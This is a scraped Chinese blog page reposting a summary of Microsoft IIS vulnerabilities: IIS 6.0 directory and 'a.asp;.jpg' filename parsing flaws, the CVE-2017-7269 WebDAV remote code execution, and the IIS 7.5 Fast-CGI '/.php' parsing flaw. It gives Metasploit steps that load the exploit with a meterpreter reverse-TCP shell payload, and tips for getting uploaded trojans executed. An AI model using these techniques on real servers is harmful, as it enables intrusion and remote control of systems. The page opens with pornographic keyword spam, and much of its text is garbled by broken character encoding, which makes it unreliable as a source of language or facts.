日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

IIS 漏洞总结

發(fā)布時(shí)間:2024/8/1 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 IIS 漏洞总结 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

?

?

目錄

IIS介紹

IIS6.0 版本

目錄解析漏洞

文件名解析漏洞

遠(yuǎn)程代碼執(zhí)行漏洞? cve_2017_7269?

漏洞描述

POC 說(shuō)明

漏洞利用

IIS7.5版本

IIS解析漏洞

漏洞原理

實(shí)驗(yàn)環(huán)境搭建

漏洞復(fù)現(xiàn)


IIS介紹

iis是Internet Information Services的縮寫(xiě),意為互聯(lián)網(wǎng)信息服務(wù),是由微軟公司提供的基于運(yùn)行Microsoft Windows的互聯(lián)網(wǎng)基本服務(wù)

IIS6.0 版本

目錄解析漏洞

對(duì)于名字為.asp后綴的文件夾,IIS會(huì)將該文件夾內(nèi)部的文件都解析為.asp文件來(lái)執(zhí)行。

即構(gòu)造名字為a.asp的目錄,目錄中的1.txt會(huì)作為asp文件執(zhí)行。

文件名解析漏洞

對(duì)于名字為'a.asp;.jpg'文件,IIS并非以最后一個(gè)后綴名來(lái)判斷格式,故會(huì)將其解析為asp文件并執(zhí)行。

即上傳木馬的后綴名為'.asp;.jpg'就可以被服務(wù)器執(zhí)行。

遠(yuǎn)程代碼執(zhí)行漏洞? cve_2017_7269?

漏洞描述

IIS?6.0默認(rèn)不開(kāi)啟WebDAV,一旦開(kāi)啟了WebDAV支持,安裝了IIS6.0的服務(wù)器將可能受到該漏洞的威脅,遠(yuǎn)程攻擊者通過(guò)以“if:<http://"開(kāi)頭的長(zhǎng)header?PROPFIND請(qǐng)求,執(zhí)行任意代碼。

POC 說(shuō)明

  • cve_2017_7269 .rb
  • 此文件在我的資源中可以找到,或者私信我,我發(fā)給你!
  • 此處給出的該漏洞的exploit,用戶需要結(jié)合Kali?中的Metasploit使用!放到kali路徑為:/usr/share/metasploit-framework/modules/exploits/windows/iis/

漏洞利用

1.打開(kāi)windows 2003 開(kāi)啟WebDAV

2.打開(kāi)kali,將我們的poc文件放到指定位置,利用msf完成本次任務(wù)!

  • use expolit/windows/iis/cve_2017_7269
  • set payload windows/meterpreter/reverse_tcp
  • set rhost? 192.168.31.130
  • run

3.由于我的windows server 2003 攻擊過(guò)多,無(wú)法演示,以后會(huì)補(bǔ)上!

?

?

?

IIS7.5版本

IIS解析漏洞

漏洞原理

IIS7/7.5在Fast-CGI運(yùn)行模式下,在某文件路徑下(/x.jpg)后面加上’/.php’,則會(huì)以php文件格式解析該圖片

?

實(shí)驗(yàn)環(huán)境搭建

  • Windows sever 2008 IIS7.5
  • Php7.3 下載地址:https://windows.php.net/downloads/releases/php-7.3.27-Win32-VC15-x64.zip

?

漏洞復(fù)現(xiàn)

1.首先在網(wǎng)站根目錄下有一個(gè)1.jpg圖片,其內(nèi)容為’<?php phpinfo(); ?>’,我們正常訪問(wèn)它?http://localhost/1.jpg

2.然后我們?cè)L問(wèn) http://localhost/1.jpg/.php?,可以看到以php文件格式解析該圖片,執(zhí)行phpinfo。

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的IIS 漏洞总结的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。